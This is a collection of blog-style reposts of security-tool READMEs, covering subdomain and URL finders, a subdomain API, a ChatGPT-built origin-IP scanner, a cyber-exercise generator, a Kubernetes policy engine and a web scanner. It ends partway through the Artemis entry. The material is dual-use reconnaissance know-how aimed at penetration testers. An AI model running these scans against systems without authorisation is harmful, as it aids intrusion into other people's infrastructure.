    This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



    Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

    By: Zion3R


    xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


    Features

    • Fetches domains from curated passive sources to maximize results.

    • Supports stdin and stdout for easy integration into workflows.

    • Cross-Platform (Windows, Linux & macOS).

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xsubfind3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this onliner

    curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

    ...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xsubfind3r.git 
    • Build the utility

       cd xsubfind3r/cmd/xsubfind3r && \
      go build .
    • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xsubfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

    Example config.yaml:

    version: 0.3.0
    sources:
    - alienvault
    - anubis
    - bevigil
    - chaos
    - commoncrawl
    - crtsh
    - fullhunt
    - github
    - hackertarget
    - intelx
    - shodan
    - urlscan
    - wayback
    keys:
    bevigil:
    - awA5nvpKU3N8ygkZ
    chaos:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
    fullhunt:
    - 0d9652ce-516c-4315-b589-9b241ee6dc24
    github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
    intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
    shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
    urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xsubfind3r use the -h flag:

    xsubfind3r -h

    help message:


    _ __ _ _ _____
    __ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
    \ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
    > <\__ \ |_| | |_) | _| | | | | (_| |___) | |
    /_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

    USAGE:
    xsubfind3r [OPTIONS]

    INPUT:
    -d, --domain string[] target domains
    -l, --list string target domains' list file path

    SOURCES:
    --sources bool list supported sources
    -u, --sources-to-use string[] comma(,) separeted sources to use
    -e, --sources-to-exclude string[] comma(,) separeted sources to exclude

    OPTIMIZATION:
    -t, --threads int number of threads (default: 50)

    OUTPUT:
    --no-color bool disable colored output
    -o, --output string output subdomains' file path
    -O, --output-directory string output subdomains' directory path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

    Contribution

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    Columbus-Server - API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features

    By: Zion3R


    Columbus Project is an API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features.

    Columbus returned 638 subdomains of tesla.com in 0.231 sec.


    Usage

    By default Columbus returns only the subdomains in a JSON string array:

    curl 'https://columbus.elmasy.com/lookup/github.com'

    But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain header.

    DOMAIN="github.com"

    curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
    while read SUB
    do
    if [[ "$SUB" == "" ]]
    then
    HOST="$DOMAIN"
    else
    HOST="${SUB}.${DOMAIN}"
    fi
    echo "$HOST"
    done

    For more, check the features or the API documentation.

    Entries

    Currently, entries are got from Certificate Transparency.

    Command Line

    Usage of columbus-server:
    -check
    Check for updates.
    -config string
    Path to the config file.
    -version
    Print version informations.

    -check: Check the lates version on GitHub. Prints up-to-date and returns 0 if no update required. Prints the latest tag (eg.: v0.9.1) and returns 1 if new release available. In case of error, prints the error message and returns 2.

    Build

    git clone https://github.com/elmasy-com/columbus-server
    make build

    Install

    Create a new user:

    adduser --system --no-create-home --disabled-login columbus-server

    Create a new group:

    addgroup --system columbus

    Add the new user to the new group:

    usermod -aG columbus columbus-server

    Copy the binary to /usr/bin/columbus-server.

    Make it executable:

    chmod +x /usr/bin/columbus-server

    Create a directory:

    mkdir /etc/columbus

    Copy the config file to /etc/columbus/server.conf.

    Set the permission to 0600.

    chmod -R 0600 /etc/columbus

    Set the owner of the config file:

    chown -R columbus-server:columbus /etc/columbus

    Install the service file (eg.: /etc/systemd/system/columbus-server.service).

    cp columbus-server.service /etc/systemd/system/

    Reload systemd:

    systemctl daemon-reload

    Start columbus:

    systemctl start columbus-server

    If you want to columbus start automatically:

    systemctl enable columbus-server


    Chaos - Origin IP Scanning Utility Developed With ChatGPT

    By: Zion3R


    chaos is an 'origin' IP scanner developed by RST in collaboration with ChatGPT. It is a niche utility with an intended audience of mostly penetration testers and bug hunters.

    An origin-IP is a term-of-art expression describing the final public IP destination for websites that are publicly served via 3rd parties. If you'd like to understand more about why anyone might be interested in Origin-IPs, please check out our blog post.

    chaos was rapidly prototyped from idea to functional proof-of-concept in less than 24 hours using our principles of DevOps with ChatGPT.

    usage: chaos.py [-h] -f FQDN -i IP [-a AGENT] [-C] [-D] [-j JITTER] [-o OUTPUT] [-p PORTS] [-P] [-r] [-s SLEEP] [-t TIMEOUT] [-T] [-v] [-x] 
    _..._
    .-'` `'-.
    __|___________|__
    \ /
    `._ CHAOS _.'
    `-------`
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    /_____________________\\
    CHAtgpt Origin-ip Scanner
    _______ _______ _______ _______ _______
    |\\ /|\\ /|\\ /|\\ /|\\/|
    | +---+ | +---+ | +---+ | +---+ | +---+ |
    | |H | | |U | | |M | | |A | | |N | |
    | |U | | |S | | |A | | |N | | |C | |
    | |M | | |E | | |N | | |D | | |O | |
    | |A | | |R | | |C | | | | | |L | |
    | +---+ | +---+ | +---+ | +---+ | +---+ |
    |/_____|\\_____|\\_____|\\_____|\\_____\\

    Origin IP Scanner developed with ChatGPT
    cha*os (n): complete disorder and confusion
    (ver: 0.9.4)


    Features

    • Threaded for performance gains
    • Real-time status updates and progress bars, nice for large scans ;)
    • Flexible user options for various scenarios & constraints
    • Dataset reduction for improved scan times
    • Easy to use CSV output

    Installation

    1. Download / clone / unzip / whatever
    2. cd path/to/chaos
    3. pip3 install -U pip setuptools virtualenv
    4. virtualenv env
    5. source env/bin/activate
    6. (env) pip3 install -U -r ./requirements.txt
    7. (env) ./chaos.py -h

    Options

    -h, --help            show this help message and exit
    -f FQDN, --fqdn FQDN Path to FQDN file (one FQDN per line)
    -i IP, --ip IP IP address(es) for HTTP requests (Comma-separated IPs, IP networks, and/or files with IP/network per line)
    -a AGENT, --agent AGENT
    User-Agent header value for requests
    -C, --csv Append CSV output to OUTPUT_FILE.csv
    -D, --dns Perform fwd/rev DNS lookups on FQDN/IP values prior to request; no impact to testing queue
    -j JITTER, --jitter JITTER
    Add a 0-N second randomized delay to the sleep value
    -o OUTPUT, --output OUTPUT
    Append console output to FILE
    -p PORTS, --ports PORTS
    Comma-separated list of TCP ports to use (default: "80,443")
    -P, --no-prep Do not pre-scan each IP/port w ith `GET /` using `Host: {IP:Port}` header to eliminate unresponsive hosts
    -r, --randomize Randomize(ish) the order IPs/ports are tested
    -s SLEEP, --sleep SLEEP
    Add N seconds before thread completes
    -t TIMEOUT, --timeout TIMEOUT
    Wait N seconds for an unresponsive host
    -T, --test Test-mode; don't send requests
    -v, --verbose Enable verbose output
    -x, --singlethread Single threaded execution; for 1-2 core systems; default threads=(cores-1) if cores>2

    Examples

    Localhost Testing

    Launch python HTTP server

    % python3 -u -m http.server 8001
    Serving HTTP on :: port 8001 (http://[::]:8001/) ...

    Launch ncat as HTTP on a port detected as SSL; use a loop because --keep-open can hang

    % while true; do ncat -lvp 8443 -c 'printf "HTTP/1.0 204 Plaintext OK\n\n<html></html>\n"'; done
    Ncat: Version 7.94 ( https://nmap.org/ncat )
    Ncat: Listening on [::]:8443
    Ncat: Listening on 0.0.0.0:8443

    Also launch ncat as SSL on a port that will default to HTTP detection

    % while true; do ncat --ssl -lvp 8444 -c 'printf "HTTP/1.0 202 OK\n\n<html></html>\n"'; done    
    Ncat: Version 7.94 ( https://nmap.org/ncat )
    Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
    Ncat: SHA-1 fingerprint: 0208 1991 FA0D 65F0 608A 9DAB A793 78CB A6EC 27B8
    Ncat: Listening on [::]:8444
    Ncat: Listening on 0.0.0.0:8444

    Prepare an FQDN file:

    % cat ../test_localhost_fqdn.txt 
    www.example.com
    localhost.example.com
    localhost.local
    localhost
    notreally.arealdomain

    Prepare an IP file / list:

    % cat ../test_localhost_ips.txt 
    127.0.0.1
    127.0.0.0/29
    not_an_ip_addr
    -6.a
    =4.2
    ::1

    Run the scan

    • Note an IPv6 network added to IPs on the CLI
    • -p to specify the ports we are listening on
    • -x for single threaded run to give our ncat servers time to restart
    • -s0.2 short sleep for our ncat servers to restart
    • -t1 to timeout after 1 second
    % ./chaos.py -f ../test_localhost_fqdn.txt -i ../test_localhost_ips.txt,::1/126 -p 8001,8443,8444 -x -s0.2 -t1   
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost.local
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: notreally.arealdomain
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block =4.2
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block -6.a
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block not_an_ip_addr
    2023-06-21 12:48:33 [INFO] * ---- <META> ---- *
    2023-06-21 12:48:33 [INFO] * Version: 0.9.4
    2023-06-21 12:48:33 [INFO] * FQDN file: ../test_localhost_fqdn.txt
    2023-06-21 12:48:33 [INFO] * FQDNs loaded: ['www.example.com', 'localhost.example.com']
    2023-06-21 12:48:33 [INFO] * IP input value(s): ../test_localhost_ips.txt,::1/126
    2023-06-21 12:48:33 [INFO] * Addresses pars ed from IP inputs: 12
    2023-06-21 12:48:33 [INFO] * Port(s): 8001,8443,8444
    2023-06-21 12:48:33 [INFO] * Thread(s): 1
    2023-06-21 12:48:33 [INFO] * Sleep value: 0.2
    2023-06-21 12:48:33 [INFO] * Timeout: 1.0
    2023-06-21 12:48:33 [INFO] * User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 ch4*0s/0.9.4
    2023-06-21 12:48:33 [INFO] * ---- </META> ---- *
    2023-06-21 12:48:33 [INFO] 36 unique address/port addresses for testing
    Prep Tests: 100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ&# 9608;β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 36/36 [00:29<00:00, 1.20it/s]
    2023-06-21 12:49:03 [INFO] 9 IP/ports verified, reducing test dataset from 72 entries
    2023-06-21 12:49:03 [INFO] 18 pending tests remain after pre-testing
    2023-06-21 12:49:03 [INFO] Queuing 18 threads
    ++RCVD++ (200 OK) www.example.com @ :::8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ :::8443
    ++RCVD++ (202 OK) www.example.com @ :::8444
    ++RCVD++ (200 OK) www.example.com @ ::1:8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ ::1:8443
    ++RCVD++ (202 OK) www.example.com @ ::1:8444
    ++RCVD++ (200 OK) www.example.com @ 127.0.0.1:8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ 127.0.0.1:8443
    ++RCVD++ (202 OK) www.example.com @ 127.0.0.1:8444
    ++RCVD++ (200 OK) localhost.example.com @ :::8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ :::8443
    ++RCVD+ + (202 OK) localhost.example.com @ :::8444
    ++RCVD++ (200 OK) localhost.example.com @ ::1:8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ ::1:8443
    ++RCVD++ (202 OK) localhost.example.com @ ::1:8444
    ++RCVD++ (200 OK) localhost.example.com @ 127.0.0.1:8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ 127.0.0.1:8443
    ++RCVD++ (202 OK) localhost.example.com @ 127.0.0.1:8444
    Origin Scan: 100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ&#96 08;β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 18/18 [00:06<00:00, 2.76it/s]
    2023-06-21 12:49:09 [RSLT] Results from 5 FQDNs:
    ::1
    ::1:8444 => (202 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8001 => (200 / OK)

    127.0.0.1
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)

    ::
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)

    www.example.com
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)
    ::1:8001 => (200 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8444 => (202 / OK)
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)

    localhost.example.com
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)
    ::1:8001 => (200 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8444 => (202 / OK)
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)


    rst@r57 chaos %

    Test & Verbose localhost

    -T runs in test mode (do everything except send requests)

    -v verbose option provides additional output


    Known Defects

    • HTTP/HTTPS detection is not ideal
    • Need option to adjust CSV newline delimiter
    • Need options to adjust where long strings / many lines are truncated
    • Try to figure out why we marked requests v2.x as required ;)
    • Options for very-verbose / quiet
    • Stagger thread launch when we're using sleep / jitter
    • Search for meta-refresh in 200 responses
    • Content-Location header for 201s ?
    • Improve thread name generation so we have the right number of unique names
    • Sanity check on IPv6 netmasks to prevent scans that outlive the sun?
    • TBD?

    Related Links

    Disclaimers

    • Copyright (C) 2023 RST
    • This software is distributed on an "AS IS" basis, without express or implied warranties of any kind
    • This software is intended for research and/or authorized testing; it is your responsibility to ensure you are authorized to use this software in any way
    • By using this software you acknowledge that you are responsible for your actions and assume all liability for any direct, indirect, or other damages


    Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

    By: Zion3R


    xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.


    Features

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xurlfind3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this onliner

    curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

    ...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xurlfind3r.git 
    • Build the utility

       cd xurlfind3r/cmd/xurlfind3r && \
      go build .
    • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xurlfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

    Example config.yaml:

    version: 0.2.0
    sources:
    - bevigil
    - commoncrawl
    - github
    - intelx
    - otx
    - urlscan
    - wayback
    keys:
    bevigil:
    - awA5nvpKU3N8ygkZ
    github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
    intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
    urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xurlfind3r use the -h flag:

    xurlfind3r -h

    help message:

                     _  __ _           _ _____      
    __ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
    \ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
    > <| |_| | | | | _| | | | | (_| |___) | |
    /_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

    USAGE:
    xurlfind3r [OPTIONS]

    TARGET:
    -d, --domain string (sub)domain to match URLs

    SCOPE:
    --include-subdomains bool match subdomain's URLs

    SOURCES:
    -s, --sources bool list sources
    -u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
    --skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
    --skip-wayback-source bool with wayback , skip parsing source code snapshots

    FILTER & MATCH:
    -f, --filter string regex to filter URLs
    -m, --match string regex to match URLs

    OUTPUT:
    --no-color bool no color mode
    -o, --output string output URLs file path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

    Examples

    Basic

    xurlfind3r -d hackerone.com --include-subdomains

    Filter Regex

    # filter images
    xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'

    Match Regex

    # match js URLs
    xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'

    Contributing

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    AiCEF - An AI-assisted cyber exercise content generation framework using named entity recognition

    By: Zion3R


    AiCEF is a tool implementing the accompanying framework [1] in order to harness the intelligence that is available from online resources, as well as threat groups' activities, arsenal (eg. MITRE), to create relevant and timely cybersecurity exercise content. This way, we abstract the events from the reports in a machine-readable form. The produced graphs can be infused with additional intelligence, e.g. the threat actor profile from MITRE, also mapped in our ontology. While this may fill gaps that would be missing from a report, one can also manipulate the graph to create custom and unique models. Finally, we exploit transformer-based language models like GPT to convert the graph into text that can serve as the scenario of a cybersecurity exercise. We have tested and validated AiCEF with a group of experts in cybersecurity exercises, and the results clearly show that AiCEF significantly augments the capabilities in creating timely and relevant cybersecurity exercises in terms of both quality and time.

    We used Python to create a machine-learning-powered Exercise Generation Framework and developed a set of tools to perform a set of individual tasks which would help an exercise planner (EP) to create a timely and targeted Cybersecurity Exercise Scenario, regardless of her experience.


    Problems an Exercise Planner faces:

    • Constant table-top research to have fresh content
    • Realistic CSE scenario creation can be difficult and time-consuming
    • Meeting objectives but also keeping it appealing for the target audience
    • Is the relevance and timeliness aspects considered?
    • Can all the above be automated?

    Our Main Objective: Build an AI powered tool that can generate relevant and up-to-date Cyber Exercise Content in a few steps with little technical expertise from the user.

    Release Roadmap

    The updated project, AiCEF v.2.0 is planned to be publicly released by the end of 2023, pending heavy code review and functionality updates. Submodules with reduced functinality will start being release by early June 2023. Thank you for your patience.

    Installation

    The most convenient way to install AiCEF is by using the docker-compose command. For production deployment, we advise you deploy MySQL manually in a dedicated environment and then to start the other components using Docker.

    First, make sure you have docker-compose installed in your environment:

    
    Linux:

    $ sudo apt-get install docker-compose

    Then, clone the repository:

    $ git clone https://github.com/grazvan/AiCEF/docker.git /<choose-a-path>/AiCEF-docker
    $ cd /<choose-a-path>/AiCEF-docker

    Configure the environment settings

    Import the MySQL file in your

    $ mysql -u <your_username> Γ’β‚¬β€œ-password=<your_password> AiCEF_db < AiCEF_db.sql 

    Before running the docker-compose command, settings must be configured. Copy the sample settings file and change it accordingly to your needs.

    $ cp .env.sample .env

    Run AiCEF

    Note: Make sure you have an OpenAI API key available. Load the environment setttings (including your MySQL connection details):

    set -a ; source .env

    Finally, run docker-compose in detached (-d) mode:

    $ sudo docker-compose up -d

    Usage

    A common usage flow consists of generating a Trend Report to analyze patterns over time, parsing relevant articles and converting them into Incident Breadcrumbs using MLTP module and storing them in a knowledge database called KDb. Incidents are then generated using IncGen component and can be enhanced using the Graph Enhancer module to simulate known APT activity. The incidents come with injects that can be edited on the fly. The CSE scenario is then created using CEGen, which defines various attributes like CSE name, number of Events, and Incidents. MLCESO is a crucial step in the methodology where dedicated ML models are trained to extract information from the collected articles with over 80% accuracy. The Incident Generation & Enhancer (IncGen) workflow can be automated, generating a variety of incidents based on filtering parameters and the existing database. The knowledge database (KDB) consists of almost 3000 articles classified into six categories that can be augmented using APT Enhancer by using the activity of known APT groups from MITRE or manually.

    Find below some sample usage screenshots:

    Features

    • An AI-powered Cyber Exercise Generation Framework
    • Developed in Python & EEL
    • Open source library Stixview
    • Stores data in MYSQL
    • API to Text Synthesis Models (ex. GPT-3.5)
    • Can create incidents based on TTPs of 125 known APT actors
    • Models Cyber Exercise Content in machine readable STIX2.1 [2] (.json) and human readable format (.pdf)

    Authors

    AiCEF is a product designed and developed by Alex Zacharis, Razvan Gavrila and Constantinos Patsakis.

    References

    [1] https://link.springer.com/article/10.1007/s10207-023-00693-z

    [2] https://oasis-open.github.io/cti-documentation/stix/intro.html

    Contributing

    Contributions are welcome! If you'd like to contribute to AiCEF v2.0, please follow these steps:

    1. Fork this repository
    2. Create a new branch (git checkout -b feature/your-branch-name)
    3. Make your changes and commit them (git commit -m 'Add some feature')
    4. Push to the branch (git push origin feature/your-branch-name)
    5. Open a new pull request

    License

    AiCEF is licensed under Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license. See for more information.

    Under the following terms:

    Attribution β€” You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. NonCommercial β€” You may not use the material for commercial purposes. No additional restrictions β€” You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.



    Polaris - Validation Of Best Practices In Your Kubernetes Clusters

    By: Zion3R

    Polaris is an open source policy engine for Kubernetes

    Polaris is an open source policy engine for Kubernetes that validates and remediates resource configuration. It includes 30+ built in configuration policies, as well as the ability to build custom policies with JSON Schema. When run on the command line or as a mutating webhook, Polaris can automatically remediate issues based on policy criteria.

    Polaris can be run in three different modes:

    • As a dashboard - Validate Kubernetes resources against policy-as-code.
    • As an admission controller - Automatically reject or modify workloads that don't adhere to your organization's policies.
    • As a command-line tool - Incorporate policy-as-code into the CI/CD process to test local YAML files.

    Validation of best practices in your Kubernetes clusters (6)

    Documentation

    Check out the documentation at docs.fairwinds.com

    Join the Fairwinds Open Source Community

    The goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap, and network with fellow Kubernetes users. Chat with us on Slack or join the user group to get involved!

    Other Projects from Fairwinds

    Enjoying Polaris? Check out some of our other projects:

    • Goldilocks - Right-size your Kubernetes Deployments by compare your memory and CPU settings against actual usage
    • Pluto - Detect Kubernetes resources that have been deprecated or removed in future versions
    • Nova - Check to see if any of your Helm charts have updates available
    • rbac-manager - Simplify the management of RBAC in your Kubernetes clusters

    Or check out the full list

    Fairwinds Insights

    If you're interested in running Polaris in multiple clusters, tracking the results over time, integrating with Slack, Datadog, and Jira, or unlocking other functionality, check out Fairwinds Insights, a platform for auditing and enforcing policy in Kubernetes clusters.



    Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

    By: Zion3R


    A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

    The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

    Artemis is experimental software, under active development - use at your own risk.

    Features

    For an up-to-date list of features, please refer to the documentation.

    Development

    Tests

    To run the tests, use:

    ./scripts/test

    Code formatting

